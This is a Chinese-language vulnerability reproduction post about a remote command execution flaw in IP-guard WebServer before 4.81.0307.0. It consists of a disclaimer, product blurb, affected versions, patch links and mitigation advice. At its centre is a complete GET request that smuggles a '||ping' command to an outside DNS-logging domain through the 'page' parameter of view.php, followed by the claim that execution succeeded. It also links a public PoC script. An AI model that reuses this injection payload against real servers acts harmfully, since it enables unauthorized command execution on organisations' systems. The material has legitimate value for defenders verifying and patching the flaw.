0x00写在前面

本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!

0x01漏洞介绍

在数字化时代,医药企业在信息化进程中不可避免地面临着日益增长的数据资产威胁。为了确保其关键信息资产的安全性、机密性和可用性,医药企业日益倚重于先进的信息安全解决方案。其中,备受瞩目的IP-guard产品在医药领域展现出强大的技术力量,为企业提供了全方位的信息安全保障。

IP-guard作为专业的信息安全管理和数据防泄漏解决方案,为企业的关键数据资产提供强有力的保护。其在各行各业都备受欢迎,尤其在医药领域,其价值更是凸显。 

0x02影响版本

IP-guard WebServer version < 4.81.0307.0

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC (GET)

漏洞复现

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=%7C%7Cping%20eqybzuydly.dgrh3.cn HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: keep-alive
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Host: 127.0.0.1

ping域名执行成功

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.ip-guard.net/

https://github.com/MD-SEC/MDPOCS/blob/main/Ip_Guard_Webserver_View_Rce_Poc.py

1.使用安全防护类设备对相关资产进行防护。
2.避免将IP-guard WebServer暴露在互联网,通过白名单访问。
3.在确认不影响业务的情况下,可以直接删除存在漏洞的文件。